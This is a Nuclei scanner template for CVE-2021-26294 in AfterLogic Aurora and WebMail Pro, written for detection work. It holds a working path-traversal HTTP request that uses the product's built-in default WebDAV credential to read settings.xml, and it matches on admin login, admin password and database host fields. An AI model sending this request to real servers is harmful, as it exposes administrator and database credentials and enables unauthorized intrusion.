53 lines
1.9 KiB
YAML
53 lines
1.9 KiB
YAML
id: CVE-2021-26294
|
||
|
||
info:
|
||
name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure
|
||
author: johnk3r
|
||
severity: high
|
||
description: |
|
||
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root.
|
||
reference:
|
||
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2021-26294
|
||
classification:
|
||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||
cvss-score: 7.5
|
||
cve-id: CVE-2021-26294
|
||
cwe-id: CWE-22
|
||
epss-score: 0.23433
|
||
epss-percentile: 0.96094
|
||
cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:*
|
||
metadata:
|
||
verified: true
|
||
max-request: 1
|
||
vendor: afterlogic
|
||
product: aurora
|
||
fofa-query: "X-Server: AfterlogicDAVServer"
|
||
tags: cve,cve2021,afterlogic,exposure,AfterLogic
|
||
|
||
http:
|
||
- raw:
|
||
- |
|
||
GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1
|
||
Host: {{Hostname}}
|
||
Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
|
||
|
||
matchers-condition: and
|
||
matchers:
|
||
- type: word
|
||
part: body
|
||
words:
|
||
- "<AdminLogin>"
|
||
- "<AdminPassword>"
|
||
- "<DBHost>"
|
||
condition: and
|
||
|
||
- type: word
|
||
part: header
|
||
words:
|
||
- "application/octet-stream"
|
||
|
||
- type: status
|
||
status:
|
||
- 200
|
||
# digest: 4b0a00483046022100e75147d5cfa4942ca17271a5b440f182bb86fd54946b1e2a67f1f43964cab92a022100bd9f9b34d2fb52908d36fab94fbfed16c40b9794df740702b73fd9498a15f470:922c64590222798bb761d5b6d8e72950 |